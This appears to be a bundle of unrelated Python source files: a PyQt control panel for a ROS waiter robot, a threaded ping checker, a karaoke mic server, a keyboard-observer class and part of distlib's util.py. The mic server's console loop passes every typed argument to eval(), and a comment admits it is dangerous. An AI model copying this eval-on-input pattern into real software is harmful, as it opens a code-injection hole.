icon10.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/left arrow.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.L.setIcon(icon10)
self.L.setIconSize(QtCore.QSize(60, 60))
self.L.setObjectName("L")
self.gridLayout.addWidget(self.L, 1, 0, 1, 1)
self.R = QtWidgets.QPushButton(self.gridLayoutWidget)
self.R.setMinimumSize(QtCore.QSize(0, 100))
self.R.setMaximumSize(QtCore.QSize(102, 100))
self.R.setText("")
icon11 = QtGui.QIcon()
icon11.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/right arrow.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.R.setIcon(icon11)
self.R.setIconSize(QtCore.QSize(60, 60))
self.R.setObjectName("R")
self.gridLayout.addWidget(self.R, 1, 2, 1, 1)
self.tabWidget.addTab(self.manual_control, "")
self.mapping = QtWidgets.QWidget()
self.mapping.setObjectName("mapping")
self.verticalLayoutWidget_2 = QtWidgets.QWidget(self.mapping)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(100, 50, 291, 381))
self.verticalLayoutWidget_2.setObjectName("verticalLayoutWidget_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.manual_map = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.manual_map.setMinimumSize(QtCore.QSize(0, 100))
self.manual_map.setObjectName("manual_map")
self.verticalLayout_2.addWidget(self.manual_map)
self.autonomous_map = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.autonomous_map.setMinimumSize(QtCore.QSize(0, 100))
self.autonomous_map.setObjectName("autonomous_map")
self.verticalLayout_2.addWidget(self.autonomous_map)
self.map_view = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
self.map_view.setMinimumSize(QtCore.QSize(0, 100))
self.map_view.setObjectName("map_view")
self.verticalLayout_2.addWidget(self.map_view)
self.tabWidget.addTab(self.mapping, "")
self.emergency_stop = QtWidgets.QPushButton(waiter_bot)
self.emergency_stop.setGeometry(QtCore.QRect(20, 300, 141, 100))
self.emergency_stop.setMinimumSize(QtCore.QSize(0, 100))
self.emergency_stop.setText("")
self.emergency_stop.setIcon(icon4)
self.emergency_stop.setIconSize(QtCore.QSize(65, 65))
self.emergency_stop.setObjectName("emergency_stop")
self.verticalLayoutWidget = QtWidgets.QWidget(waiter_bot)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 450, 160, 211))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.label_13 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_13.setMinimumSize(QtCore.QSize(0, 50))
self.label_13.setMaximumSize(QtCore.QSize(16777215, 50))
font = QtGui.QFont()
font.setFamily("URW Bookman L")
font.setPointSize(15)
self.label_13.setFont(font)
self.label_13.setAlignment(QtCore.Qt.AlignCenter)
self.label_13.setObjectName("label_13")
self.verticalLayout.addWidget(self.label_13)
self.bottom_front_cam = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.bottom_front_cam.setMinimumSize(QtCore.QSize(0, 62))
self.bottom_front_cam.setMaximumSize(QtCore.QSize(16777215, 61))
self.bottom_front_cam.setObjectName("bottom_front_cam")
self.verticalLayout.addWidget(self.bottom_front_cam)
self.up_front_cam = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.up_front_cam.setMinimumSize(QtCore.QSize(0, 62))
self.up_front_cam.setMaximumSize(QtCore.QSize(16777215, 61))
self.up_front_cam.setObjectName("up_front_cam")
self.verticalLayout.addWidget(self.up_front_cam)
self.retranslateUi(waiter_bot)
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(waiter_bot)
# Manual Control of the bot
self.LF.released.connect(self.button_released)
self.F.released.connect(self.button_released)
self.RF.released.connect(self.button_released)
self.R.released.connect(self.button_released)
self.stop.released.connect(self.button_released)
self.L.released.connect(self.button_released)
self.LB.released.connect(self.button_released)
self.B.released.connect(self.button_released)
self.RB.released.connect(self.button_released)
self.LF.pressed.connect(self.fl_button_pressed)
self.F.pressed.connect(self.f_button_pressed)
self.RF.pressed.connect(self.fr_button_pressed)
self.R.pressed.connect(self.r_button_pressed)
self.stop.pressed.connect(self.stop_button_pressed)
self.L.pressed.connect(self.l_button_pressed)
self.LB.pressed.connect(self.bl_button_pressed)
self.B.pressed.connect(self.b_button_pressed)
self.RB.pressed.connect(self.br_button_pressed)
self.manual_map.clicked.connect(self.manual_map_thread)
self.autonomous_map.clicked.connect(self.autonomous_map_thread)
self.start_auto_nav.clicked.connect(self.start_auto_nav_thread)
self.map_view.clicked.connect(self.map_view_thread)
self.emergency_stop.clicked.connect(self.emergency_stop_thread)
self.table1.clicked.connect(self.table1_button)
self.table2.clicked.connect(self.table2_button)
self.table3.clicked.connect(self.table3_button)
self.table4.clicked.connect(self.table4_button)
self.table5.clicked.connect(self.table5_button)
self.table6.clicked.connect(self.table6_button)
self.table7.clicked.connect(self.table7_button)
self.table8.clicked.connect(self.table8_button)
self.table9.clicked.connect(self.table9_button)
self.go_table.clicked.connect(self.go_table_thread)
self.return_kitchen.clicked.connect(self.return_kitchen_thread)
self.battery_low.clicked.connect(self.battery_low_thread)
self.bottom_front_cam.clicked.connect(self.b_cam_thread)
self.up_front_cam.clicked.connect(self.u_cam_thread)
self.battery_status_thread()
def retranslateUi(self, waiter_bot):
global battery
_translate = QtCore.QCoreApplication.translate
waiter_bot.setWindowTitle(_translate("waiter_bot", "Control Pannel"))
self.label.setText(_translate("waiter_bot", "RMP Waiter Bot Control"))
self.label_2.setText(_translate("waiter_bot", "Battery Level"))
self.label_12.setText(_translate("waiter_bot", str(battery)+"%"))
self.battery_low.setText(_translate("waiter_bot", "Battery Low"))
self.label_3.setText(_translate("waiter_bot", "Table 1"))
self.label_6.setText(_translate("waiter_bot", "Table 4"))
self.label_8.setText(_translate("waiter_bot", "Table 6"))
self.label_5.setText(_translate("waiter_bot", "Table 3"))
self.label_4.setText(_translate("waiter_bot", "Table 2"))
self.label_7.setText(_translate("waiter_bot", "Table 5"))
self.label_9.setText(_translate("waiter_bot", "Table 7"))
self.label_10.setText(_translate("waiter_bot", "Table 8"))
self.label_11.setText(_translate("waiter_bot", "Table 9"))
self.start_auto_nav.setText(_translate("waiter_bot", "Start"))
self.comboBox_5.setItemText(0, _translate("waiter_bot", "Select"))
self.comboBox_5.setItemText(1, _translate("waiter_bot", "Tray 1"))
self.comboBox_5.setItemText(2, _translate("waiter_bot", "Tray 2"))
self.comboBox_5.setItemText(3, _translate("waiter_bot", "Tray 3"))
self.comboBox_5.setItemText(4, _translate("waiter_bot", "Tray 4"))
self.comboBox_5.setItemText(5, _translate("waiter_bot", "Tray 5"))
self.comboBox_6.setItemText(0, _translate("waiter_bot", "Select"))
self.comboBox_6.setItemText(1, _translate("waiter_bot", "Tray 1"))
self.comboBox_6.setItemText(2, _translate("waiter_bot", "Tray 2"))
self.comboBox_6.setItemText(3, _translate("waiter_bot", "Tray 3"))
self.comboBox_6.setItemText(4, _translate("waiter_bot", "Tray 4"))
self.comboBox_6.setItemText(5, _translate("waiter_bot", "Tray 5"))
self.comboBox_3.setItemText(0, _translate("waiter_bot", "Select"))
self.comboBox_3.setItemText(1, _translate("waiter_bot", "Tray 1"))
self.comboBox_3.setItemText(2, _translate("waiter_bot", "Tray 2"))
self.comboBox_3.setItemText(3, _translate("waiter_bot", "Tray 3"))
self.comboBox_3.setItemText(4, _translate("waiter_bot", "Tray 4"))
self.comboBox_3.setItemText(5, _translate("waiter_bot", "Tray 5"))
self.comboBox_4.setItemText(0, _translate("waiter_bot", "Select"))
self.comboBox_4.setItemText(1, _translate("waiter_bot", "Tray 1"))
self.comboBox_4.setItemText(2, _translate("waiter_bot", "Tray 2"))
self.comboBox_4.setItemText(3, _translate("waiter_bot", "Tray 3"))
self.comboBox_4.setItemText(4, _translate("waiter_bot", "Tray 4"))
self.comboBox_4.setItemText(5, _translate("waiter_bot", "Tray 5"))
self.comboBox_2.setItemText(0, _translate("waiter_bot", "Select"))
self.comboBox_2.setItemText(1, _translate("waiter_bot", "Tray 1"))
self.comboBox_2.setItemText(2, _translate("waiter_bot", "Tray 2"))
self.comboBox_2.setItemText(3, _translate("waiter_bot", "Tray 3"))
self.comboBox_2.setItemText(4, _translate("waiter_bot", "Tray 4"))
self.comboBox_2.setItemText(5, _translate("waiter_bot", "Tray 5"))
self.comboBox.setItemText(0, _translate("waiter_bot", "Select"))
self.comboBox.setItemText(1, _translate("waiter_bot", "Tray 1"))
self.comboBox.setItemText(2, _translate("waiter_bot", "Tray 2"))
self.comboBox.setItemText(3, _translate("waiter_bot", "Tray 3"))
self.comboBox.setItemText(4, _translate("waiter_bot", "Tray 4"))
self.comboBox.setItemText(5, _translate("waiter_bot", "Tray 5"))
self.comboBox_7.setItemText(0, _translate("waiter_bot", "Select"))
self.comboBox_7.setItemText(1, _translate("waiter_bot", "Tray 1"))
self.comboBox_7.setItemText(2, _translate("waiter_bot", "Tray 2"))
self.comboBox_7.setItemText(3, _translate("waiter_bot", "Tray 3"))
self.comboBox_7.setItemText(4, _translate("waiter_bot", "Tray 4"))
self.comboBox_7.setItemText(5, _translate("waiter_bot", "Tray 5"))
self.comboBox_8.setItemText(0, _translate("waiter_bot", "Select"))
self.comboBox_8.setItemText(1, _translate("waiter_bot", "Tray 1"))
self.comboBox_8.setItemText(2, _translate("waiter_bot", "Tray 2"))
self.comboBox_8.setItemText(3, _translate("waiter_bot", "Tray 3"))
self.comboBox_8.setItemText(4, _translate("waiter_bot", "Tray 4"))
self.comboBox_8.setItemText(5, _translate("waiter_bot", "Tray 5"))
self.comboBox_9.setItemText(0, _translate("waiter_bot", "Select"))
self.comboBox_9.setItemText(1, _translate("waiter_bot", "Tray 1"))
self.comboBox_9.setItemText(2, _translate("waiter_bot", "Tray 2"))
self.comboBox_9.setItemText(3, _translate("waiter_bot", "Tray 3"))
self.comboBox_9.setItemText(4, _translate("waiter_bot", "Tray 4"))
self.comboBox_9.setItemText(5, _translate("waiter_bot", "Tray 5"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.table_navigation), _translate("waiter_bot", "Table Navigation"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.manual_control), _translate("waiter_bot", "Manual Control"))
self.manual_map.setText(_translate("waiter_bot", "Manual"))
self.autonomous_map.setText(_translate("waiter_bot", "Autonomous"))
self.map_view.setText(_translate("waiter_bot", "Map View / Save"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.mapping), _translate("waiter_bot", "Mapping"))
self.label_13.setText(_translate("waiter_bot", "Camera View"))
self.bottom_front_cam.setText(_translate("waiter_bot", "Bottom Front"))
self.up_front_cam.setText(_translate("waiter_bot", "Top Front"))
if __name__ == "__main__":
import sys
rospy.init_node('waiter_bot_controller')
move_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
app = QtWidgets.QApplication(sys.argv)
waiter_bot = QtWidgets.QWidget()
ui = Ui_waiter_bot()
ui.setupUi(waiter_bot)
waiter_bot.show()
sys.exit(app.exec_())
cv2.destroyAllWindows() |
event.py | #!/usr/bin/env python
from threading import Thread
import subprocess
from Queue import Queue
import time
num_threads = 3
queue = Queue()
ips = ["10.0.1.1", "10.0.1.3", "10.0.1.11", "10.0.1.51"]
def pinger(i, q):
"""Pings subnet"""
while True:
ip = q.get()
print "Thread %s: Pinging %s" % (i, ip)
ret = subprocess.call("ping -c 1 %s" % ip,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
print "%s: is alive" % ip
else:
print "%s: did not respond" % ip
q.task_done()
for i in range(num_threads):
worker = Thread(target=pinger, args=(i, queue))
worker.setDaemon(True)
worker.start()
for ip in ips:
queue.put(ip)
print "Main Thread Waiting"
queue.join()
print "Done"
|
main.py | import threading, signal, logging, shlex, traceback
from singstarmic.discoveryserver import DiscoveryServer
from singstarmic.appserver import AppServer
from singstarmic.catalogueserver import CatalogueServer
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
class MicServer:
is_running = False
servers = {}
def addServer(self, server):
thread = threading.Thread(target=server.run)
thread.name = server.__class__.__name__
self.servers[thread.name.lower()] = (server, thread)
return self
def stop(self, signal = None, frame = None):
self.is_running = False
while self.servers:
(_, (server, thread)) = self.servers.popitem()
log.info('Stopping ' + thread.name)
server.stop()
thread.join()
log.info('All servers stopped...')
def command(self, text):
lex = shlex.shlex(text.strip())
lex.quotes = '"'
lex.whitespace_split = True
lex.commenters = ''
arguments = list(lex)
if len(arguments) > 0:
# Check if we are targeting this or some other module
target = self
if arguments[0].lower() in self.servers:
target = self.servers[arguments.pop(0).lower()][0]
# Check if we have this command
command = arguments.pop(0)
if not hasattr(target, command):
log.warning('Command `{0:s}` is not supported by module {1:s}'.format(command, target.__class__.__name__))
return
# Run command
try:
# Dangerous but mkai, PoC!
arguments = [eval(argument) for argument in arguments]
getattr(target, command)(*arguments)
except Exception as e:
log.error(e)
def run(self):
self.is_running = True
# Run all servers
for _, (_, thread) in self.servers.items():
thread.start()
# Run command loop
log.info('All servers started')
while self.is_running:
self.command(input(''))
log.info('Done')
def exit(self):
self.stop()
micServer = MicServer()
signal.signal(signal.SIGINT, micServer.stop)
try:
discoveryServer = DiscoveryServer('Karaoke Party!')
catalogueServer = CatalogueServer()
appServer = AppServer()
# Do some linking
catalogueServer.onPlaylistChanged(appServer.refreshPlaylist)
# Add all different server parts
micServer.addServer(discoveryServer).addServer(catalogueServer).addServer(appServer)
# Run the whole thing
micServer.run()
except Exception as e:
micServer.stop(None, None)
if not isinstance(e, EOFError):
log.exception("")
|
keyboard.py | """Support for keyboard interaction.
Python has only little support for direct keyboard interactions. Most
functions are operating system dependent or provided by third party
libraries (like `getch`). The main goal of this module is to provide
a uniform API that can be used to detect individual keystrokes.
"""
# standard imports
from typing import Type, Optional, Iterable
from types import TracebackType
from threading import Thread
import sys
import select
import logging
# logging
LOG = logging.getLogger(__name__)
class KeyboardObserver:
"""Functionality for checking key presses. This may be used in
loops to stop the loop when a key is pressed.
.. highlight:: python
.. code-block:: python
with KeyboardObserver() as key_pressed:
while not key_pressed:
...
.. highlight:: python
.. code-block:: python
stop_on_key = KeyboardObserver()
for i in stop_on_key(range(1000000)):
print(i)
"""
_thread: Optional[Thread] = None
key_pressed: Optional[str] = None
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs) # type: ignore[call-arg]
self._thread = None
self.key_pressed = None
def __call__(self, iterable) -> Iterable:
with self:
for item in iterable:
yield item
if self:
break
def __enter__(self) -> 'KeyboardObserver':
LOG.info("Entering the KeyboardObserver context manager")
self.start_capture()
return self
def __exit__(self, exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
exc_traceback: Optional[TracebackType]) -> None: # bool
# Remark: type checker prefers return type None or Literal[False] over
# bool to signal that the context manager will not swallow exception
self.stop_capture()
LOG.info("Leaving the KeyboardObserver context manager")
# return False # no exception handling was done in the __exit__ method
def __bool__(self) -> bool:
return self.key_pressed is not None
def start_capture(self) -> None:
"""Start a key capturing process.
"""
LOG.debug("KeyboardObserver: starting a capturing thread")
if self._thread is not None:
raise RuntimeError("KeyPress is already running")
self._thread = Thread(target=self._run_capture_key, args=(),
name='key_capture_thread', daemon=True)
self._thread.start()
def stop_capture(self) -> None:
"""Stop the key capturing process.
"""
thread = self._thread
if thread is not None:
LOG.debug("KeyboardObserver: stopping the capturing thread")
self._stop_capture()
thread.join()
self._thread = None
LOG.debug("KeyboardObserver: capturing thread ended.")
else:
LOG.debug("KeyboardObserver: no capturing thread is running")
def _run_capture_key(self) -> None:
"""Run the :py:meth:`capture_key` method and clean up, once it
finishes.
"""
self._capture_key()
self._thread = None
LOG.info("Finished capturing keys with KeyboardObserver.")
def _capture_key(self) -> None:
"""Run a loop to capture a key (to be implemented by subclasses).
Once a key is pressed, this method should set the property
:py:prop:`key_pressed` and stop.
"""
# to be implemented by subclasses
def _stop_capture(self) -> None:
"""Stop the key capturing process (to be implemented by sublcasses).
"""
# to be implemented by subclasses
class DummyKeyboardObserver(KeyboardObserver):
"""A :py:class:`KeyboardObserver` that uses python's `input` function
to check for keys. This will only receive a message, once the return
key is pressed.
"""
def _capture_key(self) -> None:
"""Run a loop to capture a key.
"""
self.key_pressed = input()
def _stop_capture(self) -> None:
"""Stop the key capturing process.
"""
# end key capturing
print("Please hit the enter key to finish the KeyPress Manager")
class LoopKeyboardObserver(KeyboardObserver):
"""An auxilary :py:class:`KeyboardObserver` running a loop to
regularly check if a key was pressed.
"""
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.capture_loop = False
def _capture_key(self) -> None:
"""Run a loop to capture a key.
"""
self.capture_loop = True
while self.capture_loop and not self.key_pressed:
self._check_for_key()
def _check_for_key(self, timeout=.1) -> None:
"""Check if a key was pressed.
"""
# to be implemented by subclasses
def _stop_capture(self):
"""Stop the key capturing process.
"""
self.capture_loop = False
class SelectKeyboardObserver(LoopKeyboardObserver):
"""A :py:class:`KeyboardObserver` using the (standard) `select` module
to check if a key was pressed.
"""
def _check_for_key(self, timeout=.1) -> None:
"""Check if a key was pressed.
"""
# in_state is either an empty list (if no input is available)
# of a list containing only sys.stdin (if input is available).
# Input will only be available upon pressing return!
in_state, _o, _e = select.select([sys.stdin], [], [], timeout)
if in_state:
self.key_pressed = sys.stdin.readline().strip()
print("You said", self.key_pressed)
class GetchKeyboardObserver(LoopKeyboardObserver):
"""A :py:class:`KeyboardObserver` using the (third party) `getch`
module to check if a key was pressed.
"""
def _check_for_key(self, timeout=.1) -> None:
"""Run a loop to capture a key.
"""
# from getch impor getch
self.key_pressed = None # getch()
|
util.py | #
# Copyright (C) 2012-2017 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import socket
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import subprocess
import sys
import tarfile
import tempfile
import textwrap
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input, StringIO,
cache_from_source, urlopen, urljoin, httplib, xmlrpclib,
splittype, HTTPHandler, BaseConfigurator, valid_ident,
Container, configparser, URLError, ZipFile, fsdecode,
unquote, urlparse)
logger = logging.getLogger(__name__)
#
# Requirement parsing code as per PEP 508
#
IDENTIFIER = re.compile(r'^([\w\.-]+)\s*')
VERSION_IDENTIFIER = re.compile(r'^([\w\.*+-]+)\s*')
COMPARE_OP = re.compile(r'^(<=?|>=?|={2,3}|[~!]=)\s*')
MARKER_OP = re.compile(r'^((<=?)|(>=?)|={2,3}|[~!]=|in|not\s+in)\s*')
OR = re.compile(r'^or\b\s*')
AND = re.compile(r'^and\b\s*')
NON_SPACE = re.compile(r'(\S+)\s*')
STRING_CHUNK = re.compile(r'([\s\w\.{}()*+#:;,/?!~`@$%^&=|<>\[\]-]+)')
def parse_marker(marker_string):
"""
Parse a marker string and return a dictionary containing a marker expression.
The dictionary will contain keys "op", "lhs" and "rhs" for non-terminals in
the expression grammar, or strings. A string contained in quotes is to be
interpreted as a literal string, and a string not contained in quotes is a
variable (such as os_name).
"""
def marker_var(remaining):
# either identifier, or literal string
m = IDENTIFIER.match(remaining)
if m:
result = m.groups()[0]
remaining = remaining[m.end():]
elif not remaining:
raise SyntaxError('unexpected end of input')
else:
q = remaining[0]
if q not in '\'"':
raise SyntaxError('invalid expression: %s' % remaining)
oq = '\'"'.replace(q, '')
remaining = remaining[1:]
parts = [q]
while remaining:
# either a string chunk, or oq, or q to terminate
if remaining[0] == q:
break
elif remaining[0] == oq:
parts.append(oq)
remaining = remaining[1:]
else:
m = STRING_CHUNK.match(remaining)
if not m:
raise SyntaxError('error in string literal: %s' % remaining)
parts.append(m.groups()[0])
remaining = remaining[m.end():]
else:
s = ''.join(parts)
raise SyntaxError('unterminated string: %s' % s)
parts.append(q)
result = ''.join(parts)
remaining = remaining[1:].lstrip() # skip past closing quote
return result, remaining
def marker_expr(remaining):
if remaining and remaining[0] == '(':
result, remaining = marker(remaining[1:].lstrip())
if remaining[0] != ')':
raise SyntaxError('unterminated parenthesis: %s' % remaining)
remaining = remaining[1:].lstrip()
else:
lhs, remaining = marker_var(remaining)
while remaining:
m = MARKER_OP.match(remaining)
if not m:
break
op = m.groups()[0]
remaining = remaining[m.end():]
rhs, remaining = marker_var(remaining)
lhs = {'op': op, 'lhs': lhs, 'rhs': rhs}
result = lhs
return result, remaining
def marker_and(remaining):
lhs, remaining = marker_expr(remaining)
while remaining:
m = AND.match(remaining)
if not m:
break
remaining = remaining[m.end():]
rhs, remaining = marker_expr(remaining)
lhs = {'op': 'and', 'lhs': lhs, 'rhs': rhs}
return lhs, remaining
def marker(remaining):
lhs, remaining = marker_and(remaining)
while remaining:
m = OR.match(remaining)
if not m:
break
remaining = remaining[m.end():]
rhs, remaining = marker_and(remaining)
lhs = {'op': 'or', 'lhs': lhs, 'rhs': rhs}
return lhs, remaining
return marker(marker_string)
def parse_requirement(req):
"""
Parse a requirement passed in as a string. Return a Container
whose attributes contain the various parts of the requirement.
"""
remaining = req.strip()
if not remaining or remaining.startswith('#'):
return None
m = IDENTIFIER.match(remaining)
if not m:
raise SyntaxError('name expected: %s' % remaining)
distname = m.groups()[0]
remaining = remaining[m.end():]
extras = mark_expr = versions = uri = None
if remaining and remaining[0] == '[':
i = remaining.find(']', 1)
if i < 0:
raise SyntaxError('unterminated extra: %s' % remaining)
s = remaining[1:i]
remaining = remaining[i + 1:].lstrip()
extras = []
while s:
m = IDENTIFIER.match(s)
if not m:
raise SyntaxError('malformed extra: %s' % s)
extras.append(m.groups()[0])
s = s[m.end():]
if not s:
break
if s[0] != ',':
raise SyntaxError('comma expected in extras: %s' % s)
s = s[1:].lstrip()
if not extras:
extras = None
if remaining:
if remaining[0] == '@':
# it's a URI
remaining = remaining[1:].lstrip()
m = NON_SPACE.match(remaining)
if not m:
raise SyntaxError('invalid URI: %s' % remaining)
uri = m.groups()[0]
t = urlparse(uri)
# there are issues with Python and URL parsing, so this test
# is a bit crude. See bpo-20271, bpo-23505. Python doesn't
# always parse invalid URLs correctly - it should raise
# exceptions for malformed URLs
if not (t.scheme and t.netloc):
raise SyntaxError('Invalid URL: %s' % uri)
remaining = remaining[m.end():].lstrip()
else:
def get_versions(ver_remaining):
"""
Return a list of operator, version tuples if any are
specified, else None.
"""
m = COMPARE_OP.match(ver_remaining)
versions = None
if m:
versions = []
while True:
op = m.groups()[0]
ver_remaining = ver_remaining[m.end():]
m = VERSION_IDENTIFIER.match(ver_remaining)
if not m:
raise SyntaxError('invalid version: %s' % ver_remaining)
v = m.groups()[0]
versions.append((op, v))
ver_remaining = ver_remaining[m.end():]
if not ver_remaining or ver_remaining[0] != ',':
break
ver_remaining = ver_remaining[1:].lstrip()
m = COMPARE_OP.match(ver_remaining)
if not m:
raise SyntaxError('invalid constraint: %s' % ver_remaining)
if not versions:
versions = None
return versions, ver_remaining
if remaining[0] != '(':
versions, remaining = get_versions(remaining)
else:
i = remaining.find(')', 1)
if i < 0:
raise SyntaxError('unterminated parenthesis: %s' % remaining)
s = remaining[1:i]
remaining = remaining[i + 1:].lstrip()
# As a special diversion from PEP 508, allow a version number
# a.b.c in parentheses as a synonym for ~= a.b.c (because this
# is allowed in earlier PEPs)
if COMPARE_OP.match(s):
versions, _ = get_versions(s)
else:
m = VERSION_IDENTIFIER.match(s)
if not m:
raise SyntaxError('invalid constraint: %s' % s)
v = m.groups()[0]
s = s[m.end():].lstrip()
if s:
raise SyntaxError('invalid constraint: %s' % s)
versions = [('~=', v)]
if remaining:
if remaining[0] != ';':
raise SyntaxError('invalid requirement: %s' % remaining)
remaining = remaining[1:].lstrip()
mark_expr, remaining = parse_marker(remaining)
if remaining and remaining[0] != '#':
raise SyntaxError('unexpected trailing data: %s' % remaining)
if not versions:
rs = distname
else:
rs = '%s %s' % (distname, ', '.join(['%s %s' % con for con in versions]))
return Container(name=distname, extras=extras, constraints=versions,
marker=mark_expr, url=uri, requirement=rs)
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(root, path):
# normalizes and returns a lstripped-/-separated path
root = root.replace(os.path.sep, '/')
path = path.replace(os.path.sep, '/')
assert path.startswith(root)
return path[len(root):].lstrip('/')
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, '/').rstrip('/')
destinations[resource_file] = rel_dest + '/' + rel_path
return destinations
def in_venv():
if hasattr(sys, 'real_prefix'):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
return result
def get_executable():
# The __PYVENV_LAUNCHER__ dance is apparently no longer needed, as
# changes to the stub launcher mean that sys.executable always points
# to the stub on OS X
# if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__'
# in os.environ):
# result = os.environ['__PYVENV_LAUNCHER__']
# else:
# result = sys.executable
# return result
result = os.path.normcase(sys.executable)
if not isinstance(result, text_type):
result = fsdecode(result)
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = '%c: %s\n%s' % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
jdata = json.load(stream)
result = jdata['extensions']['python.exports']['exports']
for group, entries in result.items():
for k, v in entries.items():
s = '%s = %s' % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
def read_stream(cp, stream):
if hasattr(cp, 'read_file'):
cp.read_file(stream)
else:
cp.readfp(stream)
cp = configparser.ConfigParser()
try:
read_stream(cp, stream)
except configparser.MissingSectionHeaderError:
stream.close()
data = textwrap.dedent(data)
stream = StringIO(data)
read_stream(cp, stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = '%s = %s' % (name, value)
entry = get_export_entry(s)
assert entry is not None
#entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter('utf-8')(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = '%s:%s' % (entry.prefix, entry.suffix)
if entry.flags:
s = '%s [%s]' % (s, ', '.join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
#for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
#obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == '/':
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split('/')
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" %
os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
